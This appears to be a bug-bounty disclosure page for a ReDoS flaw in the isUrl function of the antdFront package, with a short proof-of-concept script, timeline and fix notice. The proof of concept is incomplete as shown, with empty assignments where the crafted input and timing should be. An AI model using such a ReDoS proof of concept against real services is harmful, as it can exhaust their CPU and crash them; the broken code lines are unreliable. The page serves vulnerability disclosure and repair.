Inefficient Regular Expression Complexity in x-neuron/antdfront


Reported on

Sep 2nd 2021

✍️ Description

A ReDoS (regular expression denial of service) flaw was found in the antdFront package. An attacker that is able to provide crafted input to the isUrl(input) function may cause an application to consume an excessive amount of CPU.

🕵️‍♂️ Proof of Concept

Create the following poc.mjs

// PoC.mjs
import {isUrl } from './antdFront/src/utils/is.js';
var time =;
var time_cost = - time;
console.log("Time taken to validate : " + time_cost+" ms")

Execute the following command in another terminal:

git clone and make changes like setting "type": "module" in the package.json
node poc.mjs

Check the Output:

Time taken to validate : 25051 ms

💥 Impact

This vulnerability is capable of exhausting system resources and leads to crashes. Ideally, validation should be done within 1-10 milliseconds, but in the above case, it's 25 sec.

We created a GitHub Issue asking the maintainers to create a 2 years ago
ready-research submitted a
2 years ago
We have contacted a member of the x-neuron/antdfront team and are waiting to hear back 2 years ago
We have sent a second follow up to the x-neuron/antdfront team. We will try again in 10 days. 2 years ago
We have sent a third and final follow up to the x-neuron/antdfront team. This report is now considered stale. 2 years ago
50岁的星空 validated this vulnerability a year ago
ready-research has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
50岁的星空 marked this as fixed in 2.3.1 with commit ab135d a year ago
ready-research has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation